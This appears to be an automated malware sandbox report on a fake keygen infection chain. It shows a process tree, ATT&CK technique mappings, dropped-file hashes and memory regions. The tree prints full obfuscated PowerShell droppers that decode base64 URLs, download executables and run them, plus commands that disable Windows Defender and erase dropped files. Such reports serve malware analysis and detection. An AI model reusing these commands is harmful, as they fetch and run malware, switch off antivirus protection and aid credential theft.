                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3692
                  • C:\Users\Public\zun.exe
                    "C:\Users\Public\zun.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • Modifies registry class
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5056
                    • C:\Windows\SysWOW64\WScript.exe
                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs"
                      6⤵
                        PID:1092
                        • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                          "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                          7⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Modifies registry class
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4812
                          • C:\Windows\SysWOW64\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs"
                            8⤵
                              PID:4028
                              • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                9⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of AdjustPrivilegeToken
                                PID:4136
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:4304
                                • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                                  "C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe"
                                  10⤵
                                  • Executes dropped EXE
                                  PID:3788
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                              "C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe"
                              8⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:3344
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 3344 & erase C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe & RD /S /Q C:\\ProgramData\\525291524910658\\* & exit
                                9⤵
                                  PID:5036
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 3344
                                    10⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:5108
                          • C:\Users\Public\zun.exe
                            "C:\Users\Public\zun.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4268
                          • C:\Users\Public\zun.exe
                            "C:\Users\Public\zun.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4368
                          • C:\Users\Public\zun.exe
                            "C:\Users\Public\zun.exe"
                            6⤵
                            • Executes dropped EXE
                            PID:4708
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4008
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3872
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout 2
                      3⤵
                      • Delays execution with timeout.exe
                      PID:3940
                    • C:\Windows\SysWOW64\mshta.exe
                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                      3⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4412
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                        4⤵
                        • Blocklisted process makes network request
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4492
                        • C:\Users\Public\fkm.exe
                          "C:\Users\Public\fkm.exe"
                          5⤵
                          • Executes dropped EXE
                          • Suspicious use of SetThreadContext
                          • Suspicious behavior: MapViewOfSection
                          • Suspicious use of SetWindowsHookEx
                          PID:4768
                          • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                            6⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            • Suspicious behavior: MapViewOfSection
                            • Suspicious use of SetWindowsHookEx
                            PID:5020
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                              7⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              • Checks processor information in registry
                              PID:4168
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c taskkill /pid 4168 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\637960666117663\\* & exit
                                8⤵
                                  PID:4820
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /pid 4168
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4752
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                              "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              • Suspicious behavior: MapViewOfSection
                              • Suspicious use of SetWindowsHookEx
                              PID:4988
                              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                                7⤵
                                • Executes dropped EXE
                                PID:3876
                            • C:\Users\Public\fkm.exe
                              "C:\Users\Public\fkm.exe"
                              6⤵
                              • Executes dropped EXE
                              PID:4480
                      • C:\Windows\SysWOW64\mshta.exe
                        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\262B.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                        3⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4576
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                          4⤵
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:4692
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                    1⤵
                      PID:4464
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c start C:\Windows\temp\hop4avcr.exe
                        2⤵
                          PID:4612
                          • C:\Windows\temp\hop4avcr.exe
                            C:\Windows\temp\hop4avcr.exe
                            3⤵
                            • Executes dropped EXE
                            PID:4920
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "powershell" Get-MpPreference -verbose
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2756
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4252
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2324
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4520
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3052
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:2336
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4896
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4256
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5092
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                              4⤵
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4496
                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                              4⤵
                                PID:5436
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                4⤵
                                  PID:5512
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                  4⤵
                                    PID:5688
                              • C:\Windows\SysWOW64\taskkill.exe
                                taskkill /IM cmstp.exe /F
                                2⤵
                                • Kills process with taskkill
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2268

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Defense Evasion

                            Modify Registry

                            2
                            T1112

                            Disabling Security Tools

                            2
                            T1089

                            Credential Access

                            Credentials in Files

                            3
                            T1081

                            Discovery

                            Query Registry

                            2
                            T1012

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            3
                            T1005

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\freebl3.dll
                            • C:\ProgramData\mozglue.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\msvcp140.dll
                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\softokn3.dll
                            • C:\ProgramData\sqlite3.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\ProgramData\vcruntime140.dll
                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\Keygen.exe
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\b.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\b1.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\ba.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\ba1.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\m.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\m1.hta
                            • C:\Users\Admin\AppData\Local\Temp\262B.tmp\start.bat
                            • C:\Users\Admin\AppData\Local\Temp\Coctuoidu.vbs
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                            • C:\Users\Admin\AppData\Local\Temp\GzKVM7lx6T.exe
                            • C:\Users\Admin\AppData\Local\Temp\GzKVM7lx6T.exe
                            • C:\Users\Admin\AppData\Local\Temp\HmVWClaJIM.exe
                              MD5

                              013db621a3351e3fb049efd2ccad79ff

                              SHA1

                              a23394ea54dbc5342a77938a2c285ee616185560

                              SHA256

                              df1bda6183201e4dc1bc6f6425361a565413e71f09da0648b0c82b39786af27a

                              SHA512

                              1bf6d076677b234c9da7cbc720fc64632b587b4223b5370a7ca3d53c4d59fa59ef117957b1646c92ba80dac332f6c1c313060d35de7236b2585e5bed00d79229

                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                            • C:\Users\Admin\AppData\Local\Temp\NxmaBrdzQA.exe
                            • C:\Users\Admin\AppData\Local\Temp\NxmaBrdzQA.exe
                            • C:\Users\Admin\AppData\Local\Temp\Rarujmxnv.vbs
                            • C:\Users\Admin\AppData\Local\Temp\V1hsBq1Itb.exe
                            • C:\Users\Admin\AppData\Local\Temp\V1hsBq1Itb.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\axcsdfa.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Admin\AppData\Local\Temp\hgfnmbasdo.exe
                            • C:\Users\Public\fkm.exe
                            • C:\Users\Public\fkm.exe
                            • C:\Users\Public\fkm.exe
                            • C:\Users\Public\oku.exe
                            • C:\Users\Public\oku.exe
                            • C:\Users\Public\oku.exe
                            • C:\Users\Public\zun.exe
                            • C:\Users\Public\zun.exe
                            • C:\Users\Public\zun.exe
                            • C:\Users\Public\zun.exe
                            • C:\Users\Public\zun.exe
                            • C:\Windows\Temp\hop4avcr.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\hop4avcr.exe
                              MD5

                              f4b5c1ebf4966256f52c4c4ceae87fb1

                              SHA1

                              ca70ec96d1a65cb2a4cbf4db46042275dc75813b

                              SHA256

                              88e7d1e5414b8fceb396130e98482829eac4bdc78fbc3fe7fb3f4432137e0e03

                              SHA512

                              02a7790b31525873ee506eec4ba47800310f7fb4ba58ea7ff4377bf76273ae3d0b4269c7ad866ee7af63471a920c4bd34a9808766e0c51bcaf54ba2e518e6c1e

                            • C:\Windows\temp\qwdzwmf4.inf
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\mozglue.dll
                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\nss3.dll
                              MD5

                              bfac4e3c5908856ba17d41edcd455a51

                              SHA1

                              8eec7e888767aa9e4cca8ff246eb2aacb9170428

                              SHA256

                              e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

                              SHA512

                              2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \ProgramData\sqlite3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\freebl3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\mozglue.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\nss3.dll
                              MD5

                              02cc7b8ee30056d5912de54f1bdfc219

                              SHA1

                              a6923da95705fb81e368ae48f93d28522ef552fb

                              SHA256

                              1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                              SHA512

                              0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\3098htrhpen8ifg0\softokn3.dll
                            • \Users\Admin\AppData\LocalLow\sqlite3.dll
                            • memory/416-9-0x0000000000000000-mapping.dmp
                            • memory/932-12-0x0000000000000000-mapping.dmp
                            • memory/932-14-0x0000000070620000-0x0000000070D0E000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/1092-207-0x0000000000000000-mapping.dmp
                            • memory/1896-0-0x0000000000000000-mapping.dmp
                            • memory/2268-336-0x0000000000000000-mapping.dmp
                            • memory/2324-366-0x0000000000000000-mapping.dmp
                            • memory/2324-370-0x00007FFD03620000-0x00007FFD0400C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/2336-381-0x00007FFD03620000-0x00007FFD0400C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/2336-375-0x0000000000000000-mapping.dmp
                            • memory/2348-294-0x0000000000000000-mapping.dmp
                            • memory/2352-300-0x0000000000D60000-0x0000000000D61000-memory.dmp
                              Filesize

                              4KB

                            • memory/2352-310-0x0000000005650000-0x0000000005661000-memory.dmp
                              Filesize

                              68KB

                            • memory/2352-315-0x000000000B810000-0x000000000B813000-memory.dmp
                              Filesize

                              12KB

                            • memory/2352-304-0x0000000002F00000-0x0000000002F01000-memory.dmp
                              Filesize

                              4KB

                            • memory/2352-298-0x0000000070FF0000-0x00000000716DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2352-293-0x0000000000000000-mapping.dmp
                            • memory/2600-286-0x0000000000000000-mapping.dmp
                            • memory/2600-415-0x0000000002AD0000-0x0000000002B1C000-memory.dmp
                              Filesize

                              304KB

                            • memory/2644-3-0x0000000000000000-mapping.dmp
                            • memory/2644-2-0x0000000000000000-mapping.dmp
                            • memory/2756-340-0x000001EE4E740000-0x000001EE4E741000-memory.dmp
                              Filesize

                              4KB

                            • memory/2756-341-0x000001EE509E0000-0x000001EE509E1000-memory.dmp
                              Filesize

                              4KB

                            • memory/2756-339-0x00007FFD03620000-0x00007FFD0400C000-memory.dmp
                              Filesize

                              9.9MB

                            • memory/2756-337-0x0000000000000000-mapping.dmp
                            • memory/2808-354-0x0000000070FF0000-0x00000000716DE000-memory.dmp
                              Filesize

                              6.9MB

                            • memory/2808-346-0x0000000000000000-mapping.dmp
                            • memory/3024-309-0x000000000A780000-0x000000000A785000-memory.dmp
                              Filesize

                              20KB

                            • memory/3024-306-0x000000000A6B0000-0x000000000A6C2000-memory.dmp
                              Filesize

                              72KB

